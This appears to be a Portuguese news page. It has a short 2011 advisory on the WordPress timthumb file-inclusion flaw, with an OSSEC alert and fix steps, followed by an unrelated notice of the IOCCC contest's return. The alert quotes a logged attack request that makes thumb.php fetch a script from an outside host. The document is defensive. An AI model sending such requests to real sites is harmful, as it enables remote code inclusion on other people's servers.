WordPress - Corrigindo vulnerabilidade no timthumb
Colaboração: Alexandro Silva
Data de Publicação: 18 de novembro de 2011
Surgiu uma vulnerabilidade no Wordpress classificada como alta. A falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.
O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.
OSSEC HIDS Notification. 2011 Nov 11 03:29:38 Received From: acme->/var/log/httpd/www.acme.com-access_log Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip." Portion of the log(s): xx.xxx.xxx.xxx - - [11/Nov/2011:04:29:25 -0200] "GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
Para corrigi-la é necessário executar os seguintes passos:
- Localizar se o arquivo
timthumb.php
,thumb.php
ou similar encontra-se no diretório template localizado em wp-content/themes; - Em caso afirmativo substituir todo o código pela nova versão.
Notícia publicada originalmente no blog do autor
Mais informações
markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/
Competição de código C ofuscado retorna depois de 5 anos
Fonte: Notícias Linux
O "International Obfuscated C Code Contest" (IOCCC), Competição Internacional de Código C Ofuscado, retornou e anunciou o início da vigésima competição; a competição estava em hiato, sem resultados publicados para a última competição, que foi realizada em 2006. Agora a competição está de volta e, de 12 de novembro de 2011 até 12 de janeiro de 2012, as inscrições estão abertas para a competição de escrever o mais obscuro ou ofuscado programa em linguagem C que irá ilustrar, perversamente, a importância do estilo de programação, estressar compiladores C com relação a código estranho e demonstrar as sutilezas da linguagem C. Apesar da competição já estar aberta, as submissões online serão aceitas somente a partir de 1o. de dezembro, já que o sistema de submissão está sendo atualizado.